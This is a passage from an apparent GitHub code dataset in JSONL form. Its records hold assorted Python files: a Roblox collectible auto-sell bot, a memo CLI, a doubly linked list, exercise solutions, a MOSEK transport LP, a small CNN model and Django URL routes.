\n for sale in data:\n if sale[\"idHash\"] == self.last_transaction_id:\n self.last_transaction_id = data[0][\"idHash\"] \n break \n \n agentId = sale['agent']['id']\n agentName = sale['agent']['name']\n assetId = sale['details']['id']\n assetName = sale['details']['name']\n assetType = sale['details']['type']\n amount = sale['currency']['amount']\n if assetType != 'Asset':\n continue\n\n mewt_data = self.find_mewtdata_by_id(int(assetId))\n \n if not mewt_data:\n continue\n\n self.logs.append(f\"{agentName} bought {assetName}, you earned {amount}!\")\n if self.webhook_enabled:\n self.webhook.post(agentName, agentId, assetName, assetId, mewt_data[\"thumbnail\"], amount)\n else:\n time.sleep(5)\n return self.scan_recent_transactions()\n\n except Exception as error:\n print(error)\n time.sleep(5)\n return self.scan_recent_transactions()\n\n def fetch_inventory(self, assettype, cursor = \"\", data = []):\n try:\n conn = self.session.get(f\"https://inventory.roblox.com/v2/users/{self.client['id']}/inventory/{assettype}?cursor={cursor}&limit=100&sortOrder=Desc\")\n if(conn.status_code == 200):\n conn_data = conn.json()\n data = data + conn_data[\"data\"]\n\n if conn_data[\"nextPageCursor\"] is not None:\n return self.fetch_inventory(assettype, conn_data[\"nextPageCursor\"], data)\n \n return data\n elif(conn.status_code == 429):\n time.sleep(5)\n return self.fetch_inventory(assettype, cursor, data)\n except:\n time.sleep(5)\n return self.fetch_inventory(assettype, cursor, data)\n\n \n def fetch_item_resellable(self, collectableItemId, cursor = \"\", data = []):\n try:\n conn = self.session.get(f\"https://apis.roblox.com/marketplace-sales/v1/item/{collectableItemId}/resellable-instances?cursor={cursor}&ownerType=User&ownerId={self.client['id']}&limit=500\")\n if(conn.status_code == 200):\n conn_data = conn.json()\n data = data + conn_data[\"itemInstances\"]\n if conn_data[\"nextPageCursor\"] is not None:\n return self.fetch_item_resellable(collectableItemId, conn_data[\"nextPageCursor\"], data)\n \n return data\n else:\n time.sleep(10)\n return self.fetch_item_resellable(collectableItemId, cursor, data)\n except:\n time.sleep(5)\n return self.fetch_item_resellable(collectableItemId, cursor, data)\n \n def fetch_item_details(self, items):\n try:\n conn = self.session.post(\"https://apis.roblox.com/marketplace-items/v1/items/details\", json={ \"itemIds\": items })\n if(conn.status_code == 200):\n conn_data = conn.json()\n return conn_data\n else:\n time.sleep(5)\n return self.fetch_item_details(items)\n except:\n time.sleep(5)\n return self.fetch_item_details(items)\n \n def fetch_reseller(self, collectableItemId):\n try:\n conn = self.session.get(f\"https://apis.roblox.com/marketplace-sales/v1/item/{collectableItemId}/resellers?limit=1\")\n if(conn.status_code == 200):\n conn_data = conn.json()\n return conn_data[\"data\"][0]\n else:\n time.sleep(5)\n return self.fetch_reseller(collectableItemId)\n except:\n time.sleep(5)\n return self.fetch_reseller(collectableItemId)\n\n def fetch_item_details_chunks(self, items):\n chunks = []\n data = []\n collectable_items = []\n\n for item in items:\n mewt_data = self.find_mewtdata_by_id(int(item))\n if mewt_data:\n collectable_items.append(mewt_data[\"collectibleItemId\"])\n\n while len(collectable_items) > 0:\n chunks.append(collectable_items[:120])\n collectable_items = collectable_items[120:]\n\n for chunk in chunks:\n new_data = self.fetch_item_details(chunk)\n data = data + new_data\n\n return data\n \n def sell_item(self, price, collectibleItemId, collectibleInstanceId, collectibleProductId):\n try:\n payload = {\n \"collectibleProductId\": collectibleProductId,\n \"isOnSale\": True,\n \"price\": price,\n \"sellerId\": self.client[\"id\"],\n \"sellerType\": \"User\",\n }\n conn = self.session.patch(f\"https://apis.roblox.com/marketplace-sales/v1/item/{collectibleItemId}/instance/{collectibleInstanceId}/resale\", json=payload)\n if(conn.status_code == 200):\n return True\n else:\n time.sleep(10)\n return self.sell_item(price, collectibleItemId, collectibleInstanceId, collectibleProductId)\n except:\n time.sleep(10)\n return self.sell_item(price, collectibleItemId, collectibleInstanceId, collectibleProductId)\n \n def sell_all_items(self):\n if(len(self.inventory) > 0):\n try:\n inventory = copy.deepcopy(self.inventory)\n price_cache = {}\n \n for collectibleItemId, collectibleInstanceIds in inventory.items():\n for collectibleInstanceId in collectibleInstanceIds:\n if collectibleInstanceId in self.onsale:\n if collectibleInstanceId in self.inventory[collectibleItemId]:\n self.inventory[collectibleItemId].remove(collectibleInstanceId)\n continue\n\n price = None\n\n if self.sell_method == \"CUSTOM\":\n id = str(self.collectable_id_to_id[collectibleItemId])\n if not id in self.custom_values:\n self.logs.append(f\"Failed to sell {self.collectable_id_to_name[collectibleItemId]} due to no custom value for the item.\")\n self.resellable_count -= 1\n else:\n price = self.custom_values[id]\n elif self.sell_method == \"MEWTVALUES\":\n mewt_data = self.find_mewtdata_by_collectable_item_id(collectibleItemId)\n if mewt_data[\"estimatedValue\"] <= 0:\n self.logs.append(f\"Failed to sell {self.collectable_id_to_name[collectibleItemId]} due mewt value being too low\")\n self.resellable_count -= 1\n else:\n price = mewt_data[\"estimatedValue\"] * self.mewtvalue_multiplier\n elif self.sell_method == \"UNDERCUT\":\n if collectibleItemId not in price_cache:\n recent_seller = self.fetch_reseller(collectibleItemId)\n if recent_seller[\"seller\"][\"sellerId\"] == self.client[\"id\"]:\n price_cache[collectibleItemId] = recent_seller[\"price\"]\n else:\n price_cache[collectibleItemId] = (recent_seller[\"price\"] - 1)\n\n price = price_cache[collectibleItemId]\n \n if price is not None:\n success = self.sell_item(price, collectibleItemId, collectibleInstanceId, self.collectable_instance_id_to_product_id[collectibleInstanceId])\n if success == True:\n self.logs.append(f\"Successfully put {self.collectable_id_to_name[collectibleItemId]} on sale for {price}\")\n self.onsale.append(collectibleInstanceId)\n self.resellable_count -= 1\n except Exception as error:\n print(error)\n\n\n def update_inventory(self):\n self.resellable_count = 0\n self.inventory = {}\n can_resell_collectables = []\n\n if len(self.whitelist) > 0:\n item_details = self.fetch_item_details_chunks(self.whitelist)\n for item in item_details:\n mewt_data = self.find_mewtdata_by_id(item[\"itemTargetId\"])\n if(mewt_data and mewt_data[\"resellable\"] == True):\n if not item[\"itemTargetId\"] in self.blacklist:\n self.collectable_id_to_name[item[\"collectibleItemId\"]] = item[\"name\"]\n self.id_to_name[item[\"itemTargetId\"]] = item[\"name\"]\n self.collectable_id_to_id[item[\"collectibleItemId\"]] = item[\"itemTargetId\"]\n if not item[\"collectibleItemId\"] in can_resell_collectables:\n can_resell_collectables.append(item[\"collectibleItemId\"])\n elif self.sell_method == \"CUSTOM\":\n item_details = self.fetch_item_details_chunks(list(self.custom_values.keys()))\n for item in item_details:\n mewt_data = self.find_mewtdata_by_id(item[\"itemTargetId\"])\n if(mewt_data and mewt_data[\"resellable\"] == True):\n if not item[\"itemTargetId\"] in self.blacklist:\n self.collectable_id_to_name[item[\"collectibleItemId\"]] = item[\"name\"]\n self.id_to_name[item[\"itemTargetId\"]] = item[\"name\"]\n self.collectable_id_to_id[item[\"collectibleItemId\"]] = item[\"itemTargetId\"]\n if not item[\"collectibleItemId\"] in can_resell_collectables:\n can_resell_collectables.append(item[\"collectibleItemId\"])\n else:\n for assettype in collectable_types:\n inventory_data = self.fetch_inventory(assettype)\n self.raw_inventory.extend(inventory_data)\n\n for raw_item in self.raw_inventory:\n if not raw_item[\"assetId\"] in self.blacklist:\n mewt_data = self.find_mewtdata_by_id(raw_item[\"assetId\"])\n if(mewt_data and mewt_data[\"resellable\"] == True):\n self.collectable_id_to_name[raw_item[\"collectibleItemId\"]] = raw_item[\"assetName\"]\n self.id_to_name[raw_item[\"assetId\"]] = raw_item[\"assetName\"]\n self.collectable_id_to_id[raw_item[\"collectibleItemId\"]] = raw_item[\"assetId\"]\n if not raw_item[\"collectibleItemId\"] in can_resell_collectables:\n can_resell_collectables.append(raw_item[\"collectibleItemId\"])\n\n self.logs.append(f\"Found {len(can_resell_collectables)} different collectables that are resellable\")\n for item in can_resell_collectables:\n resellable_data = self.fetch_item_resellable(item)\n total_instance_copies = 0 \n for instance in resellable_data:\n if instance[\"isHeld\"] == False and instance[\"saleState\"] == \"OffSale\":\n if not item in self.inventory:\n self.inventory[item] = []\n self.resellable_count += 1\n total_instance_copies += 1\n self.collectable_instance_id_to_product_id[instance[\"collectibleInstanceId\"]] = instance[\"collectibleProductId\"]\n self.inventory[item].append(instance[\"collectibleInstanceId\"])\n self.logs.append(f\"Loaded all resellable instances for {self.collectable_id_to_name[item]}; Copies: {total_instance_copies}\")\n\n self.logs.append(f\"Successfully updated inventory. Resellable: {self.resellable_count}\")\n\n\n def infinite_thread(self, func, _time):\n def _func():\n while True:\n func()\n time.sleep(_time)\n threading.Thread(target=_func,).start()\n\n\nif __name__ == '__main__':\n Client()\n","repo_name":"workframes/mewtxjava-autosell","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":21005,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"19338016549","text":"# memo.py -- file read and write --> ../static/data_docs/memo.pdb\nimport sys, os\n\nos.system('cls')\n\n# [TEST argv] --------------------------------------------------------------\n# <class 'list'> command='1', arg1='2' arg2='3'\n\n# print('sys.argv=',sys.argv) #['memo.py', 'dd','dd']\n# print('len=',len(sys.argv)) #['memo.py', 'dd','dd']\n#\n# for n in range(len(sys.argv)):\n# print('sys.argv[%s]='%n, sys.argv[n]) #['memo.py', 'dd','dd']\n#\n# print(type(sys.argv)) #['D:\\..\\.memo.py', 'dd','dd'] .. include {PATH}\n# print(len(sys.argv)) #f\n#\nDESTIN_DIR='../static/data_doc/'\nMY_MEMO = 'memo.pdb'\n\nHELP_MESSAGE='''\\n\\n\\\n====================================================\n MEMO.PY -- HELP MESSAGE\n---------------------------------------------------\nThis is simple example of read & write file funtion\n\nUSAGE: python memo.py {mode}, [args1]\n=====\n -a --append: ADD Memo = args1\n -v --verbose: VIEW Memo w/o args1\n----------------------------------------------------\n'''\n\nHEADER='''\\n\n====================================================\n %s\n----------------------------------------------------'''\n\n# [ BODY ] --------------------------------------------------------------\n\nif len(sys.argv) < 2:\n print('\\n**** ERR: YOU NEED MORE THAN 1 Argv(option)! ****')\n print(HELP_MESSAGE)\n raise SystemExit(1) # Exception and forced shutdown.\nelse:\n option = sys.argv[1] # [ argv_list, args1, args2...]\n MESSAGE = \"MEMO OPTION: \"+option\n print(HEADER % MESSAGE)\n\n\nif option == '-h' or option == '--help':\n print(HELP_MESSAGE)\n\nelif option == '-a' or option =='--append': # append mode = -a/\n if len(sys.argv) < 3:\n print(\"*** MISSING ARGV[2] ***\")\n else:\n memo = sys.argv[2]\n f = open(DESTIN_DIR+MY_MEMO, 'a') # append mode open\n f.write(memo+\"\\n\")\n # f.write(\"\\n\")\n f.close()\n\nelif option == '-v' or option=='--verbose': # verbose mode /\n f = open(DESTIN_DIR+MY_MEMO, 'r') # read mode open\n memo = f.read()\n f.close()\n print(memo)\n\nelse:\n print('**** ERR: OPTION is not available! ****')\n","repo_name":"unins/K-Mooc","sub_path":"simple_drill/file_memo_rw.py","file_name":"file_memo_rw.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72662909051","text":"'''\nThis module contains both a Node and a LinkedList class to create a doubly linked list data \nstructure. A Doubly Linked List (DLL) contains an extra pointer, typically called the previous \npointer, together with next pointer and data which are there in singly linked list. \n'''\n# This class consists of a node object with data and a reference to the previous and next nodes\nclass Node:\n # constructor method that sets prev, data, and next values\n def __init__(self, data=None):\n self.prev = None\n self.data = data\n self.next = None\n\n# This class consists of making a linked list out of the Node's class\nclass LinkedList:\n # constructor method that sets an instance of a node object to the head\n def __init__(self, data):\n self.head = Node(data)\n\n # this method adds an element to the beginning of the linked list\n def push(self, data):\n newNode = Node(data)\n if self.head == None:\n return self.head\n current = self.head\n current.prev = newNode\n newNode.next = current\n self.head = newNode\n\n # this method adds an element to the end of the linked list\n def append(self, data):\n newNode = Node(data)\n if self.head == None:\n return self.head\n current = self.head\n while current.next != None:\n current = current.next\n current.next = newNode\n newNode.prev = current\n\n # this method adds an element after the given node data\n def insertAfter(self, node_data, data):\n if self.head == None:\n return self.head\n current = self.head\n newNode = Node(data)\n while current.next != None:\n if current.data == node_data:\n break\n current = current.next\n newNode.next = current.next\n newNode.prev = current\n current.next = newNode\n current.next.prev = newNode\n\n # this method adds a node at a given index\n def insertAt(self, index, data):\n if self.head == None:\n return self.head\n current = self.head\n count = 0\n while current != None:\n if count == index:\n break\n count += 1\n current = current.next\n current.data = data\n\n # this method returns the data of the given index\n def get(self, index):\n if self.head == None:\n return self.head\n count = 0\n current = self.head\n while current.next != None:\n if count == index:\n return current.data\n count += 1\n current = current.next\n return 'Index does not exist!'\n\n # this method deletes a node by the given data\n def deleteNode(self, data):\n if self.head == None:\n return self.head\n current = self.head\n while current.next != None:\n if current.data == data:\n break\n previous = current\n current = current.next\n if current == None:\n return\n previous.next = current.next\n current.next.prev = previous\n current = None\n\n # this method deletes a node by the given index\n def deleteIndex(self, index):\n if self.head == None:\n return self.head\n current = self.head\n count = 0\n while current.next != None:\n if count == index:\n break\n count += 1\n previous = current\n current = current.next\n previous.next = current.next\n current.next.prev = previous\n current = None\n\n # this method returns the length of the list\n def length(self):\n length = 0\n if self.head == None:\n return length\n current = self.head\n while current != None:\n length += 1\n current = current.next\n return length\n\n # this method prints the linked list forwards\n def print_foward(self):\n if self.head == None:\n print(\"None\")\n string = \"None<->\"\n current = self.head\n while current != None:\n string += str(current.data) + \"<->\"\n current = current.next\n string += \"None\"\n print(string)\n\n # this method prints the linked list bakwards\n def print_backward(self):\n if self.head == None:\n print(\"None\")\n string = \"None<->\"\n current = self.head\n while current.next != None:\n current = current.next\n tail = current\n while tail != None:\n string += str(tail.data) + \"<->\"\n tail = tail.prev\n string += \"None\"\n print(string)\n \n# Test the Linked List class and methods\nif __name__ == \"__main__\":\n # instance of Linked List object\n ll = LinkedList(10)\n # append(), add a node to the end of the linked list\n ll.append(21)\n ll.append(18)\n # print_forward(), prints the linked list in the forward position\n ll.print_foward()\n # push(), adds a node to the front of the linked list\n ll.push(5)\n ll.push(1)\n ll.print_foward()\n # insertAfter(), allows you to insert a node after a given node\n ll.insertAfter(5, 55)\n ll.print_foward()\n # insertAt(), adds a node at the given index\n ll.insertAt(2, 11)\n ll.print_foward()\n # deleteNode(), deletes a node by its data\n ll.deleteNode(11)\n ll.print_foward()\n # deleteIndex(), deletes the node at the given index\n ll.deleteIndex(1)\n ll.print_foward()\n # print_backward(), prints the linked list in reverse\n ll.print_backward()\n # get(), returns the node data by the given index\n print(ll.get(4))\n print(ll.get(2))\n # length(), return the length of the linked list\n print(\"Length: \" + str(ll.length()))\n'''\nSample Outputs:\n- None<->10<->21<->18<->None\n- None<->1<->5<->10<->21<->18<->None\n- None<->1<->5<->55<->10<->21<->18<->None\n- None<->1<->5<->11<->10<->21<->18<->None\n- None<->1<->5<->10<->21<->18<->None\n- None<->1<->10<->21<->18<->None\n- None<->18<->21<->10<->1<->None\n- Index does not exist!\n- 21\n- Length: 4\n'''","repo_name":"ItsJuanito/DSA-Python","sub_path":"Linked List/DoublyLinkedList.py","file_name":"DoublyLinkedList.py","file_ext":"py","file_size_in_byte":6110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71389545853","text":"from pylearn2.config import yaml_parse\n\ntrain = open('conv.yaml', 'r').read()\ntrain_params = {'train_stop': 50000,\n 'valid_stop': 60000,\n 'test_stop': 10000,\n 'batch_size': 100,\n 'output_channels_h2': 16, \n 'output_channels_h3': 64, \n 'max_epochs': 500,\n 'save_path': '.'}\ntrain = train % (train_params)\ntrain = yaml_parse.load(train)\ntrain.main_loop()\n","repo_name":"dsanno/pylearn2_mnist","sub_path":"train_mnist_conv/test_train_conv.py","file_name":"test_train_conv.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"4097407360","text":"# dfs with memorization\n# dp, dynamic programming\n\n# time O(n^2)\n# space O(n^2)\n\nclass Solution:\n def longestPalindromeSubseq(self, s: str) -> int:\n n = len(s)\n memo = dict()\n\n def dfs(l, r):\n nonlocal memo, s\n\n if (l, r) in memo:\n return memo[(l, r)]\n if l > r:\n return 0\n if l == r:\n return 1\n if s[l] == s[r]:\n memo[(l, r)] = dfs(l+1, r-1)+2\n else:\n memo[(l, r)] = max(dfs(l+1, r), dfs(l, r-1))\n\n return memo[(l, r)]\n\n return dfs(0, n-1)\n","repo_name":"boknowswiki/mytraning","sub_path":"lc/python/0516_longest_palindromic_subsequence.py","file_name":"0516_longest_palindromic_subsequence.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"31898530389","text":"import time\n\ndef read_file(filename):\n with open(filename, \"r\") as document:\n doc = [x.strip(\"\\n\") for x in document]\n return doc\n\ndef left_right_idx(str):\n acc = 0\n lst = []\n for i in range(len(str)):\n if str[i] == \"(\":\n acc += 1\n if acc == 1:\n lst.append(i)\n if str[i] == \")\":\n acc -= 1\n if acc == 0:\n lst.append(i)\n return lst\n\ndef operate(expr1, expr2, operation):\n if operation == \"+\":\n return str(int(expr1) + int(expr2))\n if operation == \"*\":\n return str(int(expr1) * int(expr2))\n\ndef result(s):\n s_lst = s.split(\" \")\n eval_lst = [c for c in s_lst if c != \"\"]\n if len(eval_lst) == 1:\n return eval_lst[0]\n while True:\n if len(eval_lst) == 3:\n eval_lst = [operate(eval_lst[0], eval_lst[2], eval_lst[1])]\n break\n eval_lst = [operate(eval_lst[0], eval_lst[2], eval_lst[1])] + eval_lst[3:]\n return eval_lst[0]\n\ndef result_adv(s):\n factor_lst = s.split(\"*\")\n if len(factor_lst) == 1:\n return result(factor_lst[0])\n str_acc = \"1\"\n for factor in factor_lst:\n str_acc = str(int(result(factor))*int(str_acc))\n return str_acc\n\ndef replace_str(str, result_lst, idxs):\n new_str = \"\"\n range_lst = [-1] + idxs\n range_lst.append(len(str))\n for i in range(0, len(range_lst), 2):\n new_str += str[range_lst[i]+1:range_lst[i+1]]\n if i/2 < len(result_lst):\n new_str += result_lst[int(i/2)]\n return new_str\n\ndef eval_expr(str):\n if \"(\" not in str:\n return result(str)\n idxs = left_right_idx(str)\n result_lst = [eval_expr(str[idxs[i]+1:idxs[i+1]]) for i in range(0, len(idxs), 2)]\n new_str = replace_str(str, result_lst, idxs)\n return result(new_str)\n\ndef eval_expr_adv(str):\n if \"(\" not in str:\n return result_adv(str)\n idxs = left_right_idx(str)\n result_lst = [eval_expr_adv(str[idxs[i]+1:idxs[i+1]]) for i in range(0, len(idxs), 2)]\n new_str = replace_str(str, result_lst, idxs)\n return result_adv(new_str)\n\ndef part_1(filename):\n expr_lst = read_file(filename)\n return sum(int(eval_expr(expr)) for expr in expr_lst)\n\ndef part_2(filename):\n expr_lst = read_file(filename)\n return sum(int(eval_expr_adv(expr)) for expr in expr_lst)\n\nif __name__ == \"__main__\":\n filename = input(\"Enter the name of the input file: \")\n start = time.perf_counter()\n print(\"Part 1:\", part_1(filename))\n print(\"Part 2:\", part_2(filename))\n end = time.perf_counter()\n print(\"{:.3f} ms\".format((end-start)*100))\n","repo_name":"PabloCandia/advent_of_code","sub_path":"python/2020/day_18/2020-18.py","file_name":"2020-18.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5366266971","text":"import sys\nimport mosek\nimport numpy as np\n\ninf = 0.0\n\ndef streamprinter(text):\n sys.stdout.write(text)\n sys.stdout.flush()\n\ndef main(m, n, cost, mu, nu, asub, aval, solveparam='intpnt'):\n with mosek.Env() as env:\n with env.Task() as task:\n task.set_Stream(mosek.streamtype.log, streamprinter)\n # Bounds on variables\n bkx = [mosek.boundkey.lo for i in range(m * n)]\n blx = [0.0 for i in range(m * n)]\n bux = [+inf for i in range(m * n)]\n # Bounds on Constraints\n bkc = [mosek.boundkey.fx for i in range(m + n)]\n blc = mu + nu\n buc = mu + nu\n # Objective construction\n c = cost\n numvar = m * n\n numcon = m + n\n # Append num of var and cons\n task.appendcons(numcon)\n task.appendvars(numvar)\n \n # Construct obj\n for j in range(numvar):\n task.putcj(j, c[j])\n\n task.putvarbound(j, bkx[j], blx[j], bux[j])\n\n task.putacol(j, asub[j], aval[j])\n \n # Construct constraint\n for i in range(numcon):\n task.putconbound(i, bkc[i], blc[i], buc[i])\n\n # Max or Min\n task.putobjsense(mosek.objsense.minimize)\n\n # Optimizer\n if solveparam == 'intpnt':\n task.putintparam(mosek.iparam.optimizer, mosek.optimizertype.intpnt)\n elif solveparam == 'simplex':\n task.putintparam(mosek.iparam.optimizer, mosek.optimizertype.free_simplex)\n task.optimize()\n\n # Task print\n task.solutionsummary(mosek.streamtype.msg)\n\n # Solution status\n solsta = task.getsolsta(mosek.soltype.bas)\n\n if (solsta == mosek.solsta.optimal or \n solsta == mosek.solsta.near_optimal):\n xx = [0.] * numvar\n task.getxx(mosek.soltype.bas, xx)\n print(\"Optimal solution: \")\n for i in range(numvar):\n print(\"x[\" + str(i) + \"]=\" + str(xx[i]))\n elif (solsta == mosek.solsta.dual_infeas_cer or\n solsta == mosek.solsta.prim_infeas_cer or\n solsta == mosek.solsta.near_dual_infeas_cer or\n solsta == mosek.solsta.near_prim_infeas_cer):\n print(\"Primal or dual infeasibility certificate found.\\n\")\n elif solsta == mosek.solsta.unknown:\n print(\"Unknown solution status\")\n else:\n print(\"Other solution status\")\n\nif __name__ == '__main__':\n m = 10\n n = 10\n cost = []\n asub = []\n aval = []\n for i in range(m):\n for j in range(n):\n asub.append([i, m+j])\n aval.append([1.0, 1.0])\n cost.append((i-j)*(i-j))\n mu = np.random.rand(m)\n mu = mu/sum(mu)\n mu = mu.tolist()\n nu = np.random.rand(n)\n nu = nu/sum(nu)\n nu = nu.tolist()\n solveparam = 'intpnt'\n\n try:\n main(m, n, cost, mu, nu, asub, aval, solveparam)\n except mosek.Error as e:\n print(\"ERROR: %s\" % str(e.errno))\n if e.msg is not None:\n print(\"\\t%s\" % e.msg)\n sys.exit(1)\n\n except:\n import traceback\n traceback.print_exc()\n sys.exit(1)\n","repo_name":"yangwenhaosms/cvxopt","sub_path":"moseksolver.py","file_name":"moseksolver.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20301249193","text":"from __future__ import annotations\nfrom typing import List, Tuple\nfrom nptyping import ndarray\n\nimport numpy as np\nimport pickle\nimport time\n\nfrom coolcnn.layers.base_layer import BaseLayer\n\n\nclass Sequential():\n def __init__(self, layers: List[BaseLayer] = []) -> None:\n self._layers = layers\n self._compiled = False\n self._input_array_list = []\n\n def add_layer(self, layer: BaseLayer) -> None:\n self._layers.append(layer)\n\n def compile(self):\n self._compiled = True\n input_shape = self._layers[0].input_shape\n for layer in self._layers:\n layer.input_shape = input_shape\n input_shape = layer.output_shape\n\n def fit(\n self,\n input_array: ndarray, # list of instance\n result_array: ndarray,\n epoch: int = 10,\n mini_batch: int = 2,\n learning_rate: float = 0.5,\n momentum: float = 0,\n ):\n if not self._compiled:\n raise RuntimeError('Error, please compile model first')\n\n self.history = []\n\n step = 0\n mse = 0.0\n acc = 0.0\n\n print()\n print('=====Start Training=====')\n print('Learning rate:', learning_rate)\n print('Epoch:', epoch)\n print('Batch size:', mini_batch)\n print('Momentum:', momentum)\n print('Total training data:', len(input_array))\n print('========================')\n print()\n\n start = time.time()\n total_batch = len(input_array) // mini_batch\n while step < (epoch * len(input_array)):\n print(\n 'Epoch',\n step // len(input_array) + 1,\n ':',\n step % len(input_array) + 1,\n '/',\n len(input_array),\n end='\\r'\n )\n\n data_idx = step % len(input_array)\n res = self.run(input_array[data_idx]).copy()\n\n mse += np.sum((result_array[data_idx] - res)**2)\n res[res < 0.5] = 0\n res[res >= 0.5] = 1\n acc += np.sum(res == result_array[data_idx])\n\n self._backpropagate(result_array[data_idx])\n\n #batch end reached\n if (step + 1) % mini_batch == 0:\n for layer in self._layers:\n layer.update_weight(momentum, learning_rate)\n\n # epoch end reached\n if (step + 1) % len(input_array) == 0:\n print('Epoch', step // len(input_array) + 1)\n print('Elapsed:', '{:.3f}'.format(time.time() - start), 's')\n print(\n 'MSE:', '{:.4f}'.format(mse / len(input_array)), \n 'Acc:', '{:.4f}'.format(acc / len(input_array))\n )\n print()\n self.history.append((mse, acc))\n start = time.time()\n mse = 0.0\n acc = 0.0\n step += 1\n\n def summary(self):\n if not self._compiled:\n raise RuntimeError('Error, please compile model first')\n\n total = 0\n for idx, layer in enumerate(self._layers):\n print(\n '{:<5}{:<20}Output Shape: {:<20}Trainable Params: {:<20}'.format(\n str(idx + 1) + '.',\n type(layer).__name__,\n str(layer.output_shape),\n layer.trainable_params,\n )\n )\n total += layer.trainable_params\n print('=' * 92)\n print('Total trainable params:', total)\n\n def run(self, input_array: ndarray) -> ndarray:\n if not self._compiled:\n raise RuntimeError('Error, please compile model first')\n\n for layer in self._layers:\n self._input_array_list.append(input_array)\n input_array = layer.process(input_array)\n\n self._input_array_list.append(input_array)\n return input_array\n\n def _backpropagate(self, target_array: ndarray) -> None:\n predicted_array = self._input_array_list[-1]\n d_error_d_out = -(target_array - predicted_array)\n\n for layer, input_array, output_array in zip(\n self._layers[::-1], self._input_array_list[-2::-1], self._input_array_list[::-1]\n ):\n d_error_d_out = layer.backpropagate(input_array, output_array, d_error_d_out)\n\n self._input_array_list = []\n\n def save(self, save_path: str) -> None:\n with open(save_path, 'wb') as model_out:\n pickle.dump(self, model_out)\n\n @staticmethod\n def load(save_path: str) -> Sequential:\n with open(save_path, 'rb') as model_saved:\n return pickle.load(model_saved)\n","repo_name":"SteveImmanuel/convo-neural-net","sub_path":"coolcnn/models/sequential.py","file_name":"sequential.py","file_ext":"py","file_size_in_byte":4662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33246987037","text":"from typing import List\nfrom collections import Counter\n\n\ndef print_perms(string: str) -> List[str]:\n \"\"\"\n Compute all permutations of a string whoe characters are not necessarily\n unique. The list of permutations should not have duplicates.\n \"\"\"\n result = []\n counter = Counter(string)\n print_perms_helper(counter, \"\", len(string), result)\n return result\n\n\ndef print_perms_helper(counter: Counter, prefix: str, remaining: int,\n result: List):\n \"\"\"\n Helper.\n \"\"\"\n # Base case. Permutation has been completed.\n if remaining == 0:\n result.append(prefix)\n return\n # Try remaining letters for next char, and generate remaining permutations.\n for c in counter:\n count = counter[c]\n if count > 0:\n counter[c] -= 1\n print_perms_helper(counter, prefix + c, remaining - 1, result)\n counter[c] = count\n\n\nprint(print_perms(\"hello\"))\n\"\"\"\n[\n 'hello', 'helol', 'heoll', 'hlelo', 'hleol', 'hlleo', 'hlloe', 'hloel',\n 'hlole', 'hoell', 'holel', 'holle', 'ehllo', 'ehlol', 'eholl', 'elhlo',\n 'elhol', 'ellho', 'elloh', 'elohl', 'elolh', 'eohll', 'eolhl', 'eollh',\n 'lhelo', 'lheol', 'lhleo', 'lhloe', 'lhoel', 'lhole', 'lehlo', 'lehol',\n 'lelho', 'leloh', 'leohl', 'leolh', 'llheo', 'llhoe', 'lleho', 'lleoh',\n 'llohe', 'lloeh', 'lohel', 'lohle', 'loehl', 'loelh', 'lolhe', 'loleh',\n 'ohell', 'ohlel', 'ohlle', 'oehll', 'oelhl', 'oellh', 'olhel', 'olhle',\n 'olehl', 'olelh', 'ollhe', 'olleh'\n]\n\"\"\"\n","repo_name":"Onteri/ctci_6th_edition","sub_path":"chapter_8_recursion_dp/python/8.8-permutations_with_dups.py","file_name":"8.8-permutations_with_dups.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25030191121","text":"\"\"\"WS_SpotifyStats URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom WS_SpotifyStats import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('songs/', views.songs_page, name='songs'),\n path('song/<str:id>/', views.song_page, name='song'),\n path('artist/<str:id>/', views.artist_page, name='artist'),\n path('artists/', views.artists_page, name='artists'),\n path('decades/', views.decades, name='decades'),\n path('genre/<str:id>/', views.genre_page, name='genre'),\n path('genres', views.genres_page, name='genres'),\n path('stats/', views.home, name='stats'),\n\n path('admin/', admin.site.urls),\n\n]","repo_name":"MarianaSequeira/WS_SpotifyStats","sub_path":"WS_SpotifyStats/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17565801639","text":"from api import base, enums\nfrom api.filter import Filter\n\n\"\"\"\nEstimateTime (second) [\n當 StopStatus 値為 2 ~ 4 或 PlateNumb 値為 -1 時,EstimateTime 値為 null; \n當 StopStatus 値為 1 時,EstimateTime 値多數為 null,僅部分路線因有固定發車時間,故 EstimateTime 有値; \n當 StopStatus 値為 0 時,EstimateTime 有値。]\n\"\"\"\n\"\"\"\nStopStatus : [0:'正常',1:'尚未發車',2:'交管不停靠',3:'末班車已過',4:'今日未營運']\n\"\"\"\n\n\nclass 